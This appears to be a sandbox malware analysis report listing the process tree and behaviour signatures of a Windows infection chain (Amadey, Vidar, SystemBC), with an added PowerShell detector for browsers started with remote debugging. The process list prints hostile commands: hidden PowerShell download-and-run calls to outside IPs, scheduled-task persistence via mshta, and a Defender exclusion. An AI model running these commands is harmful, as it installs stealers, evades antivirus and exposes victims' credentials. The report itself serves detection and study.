"C:\Users\Admin\AppData\Local\TempOR7NNTGFBEVDCUJ707HDKBDMMU1LU8KQ.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\172cf80232.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn BHvs0ma2jIR /tr "mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn BHvs0ma2jIR /tr "mshta C:\Users\Admin\AppData\Local\Temp\IbSyMR0LL.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE
"C:\Users\Admin\AppData\Local\TempNFZG5LF0I4JGLVAB6GREVZMUFYAXMB1V.EXE"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "wpz7BmapgPe" /tr "mshta \"C:\Temp\ZN3XY9qK2.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\ZN3XY9qK2.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10108150101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FA8.tmp\2FA9.tmp\2FAA.bat C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 1036
C:\Windows\system32\taskeng.exe
taskeng.exe {B025328D-7CD3-47A6-9B0D-FFB781F1671E} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\ProgramData\xadikea\lgcr.exe
C:\ProgramData\xadikea\lgcr.exe
C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 1200
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10108180101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 500
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 1020
C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10108190101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10108200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 500
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1412_133856936166700000\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10108210101\SvhQA35.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\1RTut7w2\Anubis.exe""
C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10108220101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10108230101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10108240101\nhDLtPT.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2c69758,0x7fef2c69768,0x7fef2c69778
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1084 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1320 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1384 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2284 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2304 --field-trial-handle=1700,i,9649217018281244491,4139957170140023625,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe
"C:\Users\Admin\AppData\Local\Temp\10108250101\a51af075dd.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 604 -s 1212
C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe
"C:\Users\Admin\AppData\Local\Temp\10108260101\d94fbc1156.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe
"C:\Users\Admin\AppData\Local\Temp\10108270101\019b07ca14.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 544
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe
"C:\Users\Admin\AppData\Local\Temp\10108280101\807cae801b.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\8y5fk" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe
"C:\Users\Admin\AppData\Local\Temp\10108290101\14fcfefcdd.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 00:12
Reported
2025-03-06 00:14
Platform
win10v2004-20250217-en
Max time kernel
72s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
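The rows above only record that chrome.exe and msedge.exe ran with a DevTools remote-debugging switch; they do not show which process started the browser or which profile it was pointed at, and on a live host those two details are what separate a developer's own session from a stealer driving the browser over DevTools. The PowerShell below is an added example written for this page, not output of the sandbox or code belonging to any of the families named in the report. It assumes a Windows host with the NetTCPIP module (Windows 8 / Server 2012 or later) and is run elevated so Win32_Process exposes every session's command line; the output field names are this example's own choice.

```powershell
# Added example: find Chromium-based browsers launched with remote debugging and
# show the launching process, the profile directory and whether the port is live.

function Get-RemoteDebugBrowser {
    $browsers = Get-CimInstance Win32_Process -Filter "Name='chrome.exe' OR Name='msedge.exe'"
    foreach ($p in $browsers) {
        $cmd = $p.CommandLine
        # Renderer/GPU/utility children carry --type=; only the browser process matters.
        if ($cmd -match '--type=') { continue }
        if ($cmd -notmatch '--remote-debugging-(port|pipe)') { continue }

        $port = $null
        if ($cmd -match '--remote-debugging-port=(\d+)') { $port = [int]$Matches[1] }

        $profileDir = '<default>'
        if ($cmd -match '--user-data-dir=("[^"]+"|\S+)') { $profileDir = $Matches[1].Trim('"') }

        # Port 0 means "pick one"; the browser then writes the chosen port to the
        # DevToolsActivePort file inside the profile directory.
        if ($port -eq 0 -and $profileDir -ne '<default>') {
            $activeFile = Join-Path $profileDir 'DevToolsActivePort'
            if (Test-Path $activeFile) { $port = [int](Get-Content $activeFile -TotalCount 1) }
        }

        $listening = $false
        if ($port) {
            $listening = [bool](Get-NetTCPConnection -OwningProcess $p.ProcessId -State Listen `
                                -LocalPort $port -ErrorAction SilentlyContinue)
        }

        $parent = Get-CimInstance Win32_Process -Filter "ProcessId=$($p.ParentProcessId)"

        [pscustomobject]@{
            Pid        = $p.ProcessId
            Browser    = $p.Name
            DebugPort  = $port
            Listening  = $listening
            Headless   = [bool]($cmd -match '--headless')
            ProfileDir = $profileDir
            ParentPid  = $p.ParentProcessId
            ParentPath = if ($parent) { $parent.ExecutablePath } else { '<exited>' }
        }
    }
}

Get-RemoteDebugBrowser | Format-Table -AutoSize -Wrap
```

A browser process whose ParentPath sits under %TEMP%, %APPDATA% or ProgramData, that runs headless, and that was given a copied profile via --user-data-dir is the pattern to escalate; a developer's session is normally parented by explorer.exe or an IDE. ParentPid is read from the process table at query time, so if the launcher has already exited the PID may have been reused; treat ParentPath as a lead, not proof.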
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10108160101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp4HEVSNWDIWR3GAMCNFGHQJEVE1X7BVSB.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempVUFBUSHF0SXYODOUUZE75VKFK3BHN431.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\ProgramData\ogatq\ckhhtd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10108170101\v6Oqdnc.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0389b600fa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\0389b600fa.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
